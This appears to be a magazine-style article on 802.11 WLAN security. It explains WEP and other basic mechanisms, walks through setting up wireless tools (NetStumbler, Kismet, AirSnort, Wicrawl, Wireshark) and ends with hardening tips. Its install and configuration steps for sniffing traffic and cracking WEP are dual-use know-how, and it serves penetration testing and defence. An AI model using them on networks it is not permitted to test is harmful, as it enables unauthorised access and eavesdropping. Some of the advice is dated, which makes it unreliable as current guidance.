Wireless Local Area Network (WLAN) is fast becoming popular and is being
implemented in various organizations. Its flexibility and portability enable
users to access their files, network resources and Internet. WLAN can be
installed in places where conventional LAN cannot be implemented. Ease of
scalability is another reason of its popularity. On top of all these benefits,
the
increased bandwidth and data transmission rate (similar to Ethernet speed) is
pushing growth and popularity of WLAN.
Most commonly used WLANs are based on IEEE 802.11 family of standards with
IEEE 802.11 being the first in family developed in 1997. IEEE 802.11b was the
first widely used standard that operated in 2.4-2.48 GHz band and supports 11
Mbps. Today most commonly used standards are IEEE 802.11b and 802.11g. Standard
IEEE 802.11 permits devices to establish networks on fixed access points (AP) or
as peer-to-peer networks. This standard defined two network topologies; the
infrastructure network and ad hoc network. The former is to extend range of
wired LAN by providing access of resources (on LAN) to mobile devices while the
latter is to communicate among mobile devices.
Security of 802.11 WLANs
Three basic security services defined by IEEE for WLAN are Authentication,
Confidentiality and Integrity. Authentication is achieved in this standard by
two ways; open system authentication and shared-key authentication. In open
system authentication technique, the access point accepts the mobile device
without verifying its identity, mobile device or client is authenticated if it
responds with a MAC address. This type of technique is highly vulnerable to
attack from unauthorized clients. Shared-key authentication is a cryptographic
technique based on simple challenge-response scheme. In this technique, access
point generates a random challenge and sends it to mobile device. Mobile device
encrypts this challenge with the shared key and sends response back. Access
point then decrypts this response and compares it with sent challenge and allows
access only if both of them are same.
Privacy is achieved with encryption of actual data, for example WEP (wired
equivalent privacy), uses the RC4 symmetric key stream cipher algorithm to
generate data sequence.
Finally integrity is achieved with the help of simple Cyclic Redundancy Check
(CRC) approach- for example a CRC-32 or frame check is computed on each data
packet prior to transmission.
On receivers end CRC is recomputed and compared with original message and if
they do not match message is declared modified.
Tools to identify vulnerability of WLAN
Here we will discuss various tools to show loopholes in WAN security. We
start with some commonly used softwares that detect wireless signals, then we
will try some softwares that can crack WEP (commonly used protection). One
greatest source of these tools is backtrack2 that has many preconfigured tools
to monitor wireless networks or crack WEP key. This open source linux live
distribution is widely used for penetration testing.
This is graphical representation of traffic on NetStumbler with time and day on x-axis and signal to nose ratio on y-axis. Left side displays SSIDs and chanels with various filtering criteria at the bottom |
NetStumbler
NetStumbler is a free tool for Windows that can detect wireless networks (WLAN)
working with 802.11a, 802.11b and 802.11g standards. It can be easily downloaded
from mentioned URL and installation is simple. Only issue that one can face is
compatibility of this tool with your hardware, firmware version, driver version
and operating system. There are some tried and tested configurations that one
can refer to at www.stumbler.net/compat/. Note here NetStumbler works on Windows
2000, Windows XP or latter.
Interface of NetStumbler is easy to understand and by clicking on scanning
button one can detect all the WLAN's that are in vicinity. It also gives
valuable information like MAC address, SSID, channel, speed etc. This
information can be utilized by malicious user to carry out attacks on the WLAN
such as blocking of frequency using frequency jammers (as channel is known) or
sniffing packets to break encryption.
Kismet
Kismet is a free tool that can be used as WLAN detector, packet sniffer and
intrusion detection system. Kismet can sniff 802.11a, 802.11b, 802.11n and
802.11g traffic with any card that supports raw monitoring. This tool can be
downloaded from mentioned URL or one can use #yum install kismet command on
linux terminal to install it, then to configure it open 'kismet.config' from
'/etc/kismet' folder. Find the statement 'source=none, none, addme' in the code
and change it to 'source=orinoco, eth1, root' where first parameter defines
source type, second interface card and third defines name of user. To use it
just write
# kismet
on command terminal. One can get backtrack2 that is a linux operating system
with kismet preconfigured in it (we used this option). Once kismet starts
running it can be further customized by pressing 'H' key.
Kismet lists out all the WLAN signals in vicinity and also gives size of data packets transferred, IP range and channel of transmission |
Interface of AirSnort shows packets that are transferred and BSSID. Specific channel can be selected by 'channel', traffic of other WLANs can be scanned by selecting 'scan' |
With help of this tool you can view all the AP's of the network around you
and therefore it can be used as AP detector by malicious user.
AirSnort
Now we will cover tools that can even crack encryption keys. These tools pose
greater threat to WLAN security as one can easily know about the information one
is sending on network. AirSnort is a tool that can be used to recover encryption
key. It passively monitors wireless traffic and cracks encryption key when
sufficient packets are collected. This tool can be downloaded from the web site
mentioned. For testing purpose we again used backtrack2 that has AirSnort
preconfigured in it. AirSnort is also available for Windows and linux users can
install it using following command
# yum install airsnort
Once properly installed, one can configure the simple interface of AirSnort.
Check channel radio button to monitor packets from a specific channel.' Network
device' should be chosen depending on hardware configuration and 'Drive type' is
to tell AirSnort how it can place network card in monitoring mode. One more
important setting on interface is about 'crack breadth' this option should be
maximized as it defines number of attempts that this tool will take to crack
weak packets. It takes AirSnort approximately 5-10 million packets to crack
encryption key. AirSnort exploits the weaknesses of WEP security in 802.11
standards.
Wicrawl
Wicrawl is a simple linux based AP scanner with a plug-in based architecture
that gives this tool great versatility as plugins performing different tasks can
be attached to this tool. Plugins can be easily implemented using scripts or
externally called program. Wicrawl can be downloaded from mentioned URL. We used
backtrck2 to test this tool; interface is simple with SSID filter option on top
that can be used to filter out SSID's. At this moment number of plugins are
available including 'aircrack-wep-cracking' a WEP cracking feature,
'check_speed' that checks latency of connection ,'check_internet' that checks
internet connection. Due to its plug-in based architecture, this tool poses
greater threat to WLAN security as its penetration power is ever increasing like
it can perform task of WEP cracking with different approaches using different
plugins. Plug-in (apwebcrack) is developed for cracking administrator password
of AP with the help of default passwords.
Interface of wicrawl with plugin option in tool bar that can be used for different activities. SSID filter on top is for specific monitoring |
Wireshark's interface elaborately shows data packet movement from source to destination. It also tries to give details of packets |
Wireshark
Wireshark is a network packet analyzer. It captures packet and tries to display
packets data in detail. This tool was built for eithernet packets but now
wireless capture functionality is integrated. Download this tool from mentioned
URL once downloaded installation is fairly simple. We tried this tool on windows
XP professional and using it was easy. Once we are on interface of wireshark to
start capturing packet one has to select interface by clicking on the first
button on toolbar this will list all the available interfaces. For wireless
capture select a wireless interface by clicking on the 'start' button in front
of it. This tool also acts as network detector as it lists out the entire
networks available (click on 'Details'). Types of data packets
captured by wireshark include IP, TCP, UDP etc, and there is filter available to
capture a particular type of data packet. Captured data packet poses great
threat to integrity of information and exposes information that can be critical.
Making your WLAN more secure
Now we will focus on how to make your WLAN more secure. The first major step
that organizations (using WLAN) can take is to make a security policy defining
access rights, criticality of information to be sent on WLAN and security
settings of WLAN equipments.
Proper configuration of access point is critical for having a secure WLAN.
Start with updating the default password of AP to a stronger alphanumeric
password with only administrator knowing it. Always use the strongest encryption
setting available on the product (AP) i.e. if available encryption settings are
none, 64-bit shared key and 128-bit shared key use last one. One greatest
security loophole is the reset function of AP because using it one can easily
negate all the security settings configured on AP as it restores AP back to the
factory settings. Therefore by controlling reset function of AP, WLAN can be
made more secure. Change SSID and disable broadcast SSID feature on AP also
change channel of AP i.e. channel 1, 6 and 11 can be used
simultaneously on closely placed AP's. By changing channels one also secures
his/her WLAN from frequency jamming devices. One more step that can boost
security of WLAN is using static IP addresses and if possible use of MAC ACL
(Access Control Lists) where communication is regulated according to MAC address
of clients.
Security measures implemented on LAN can also be used in WLAN like physical
protection of AP's and mobile clients, regular monitoring of different networks
available and implementation of firewalls. One can also implement IDS (intrusion
detecting systems) in WLAN. IDS for WLAN can be host based or network based.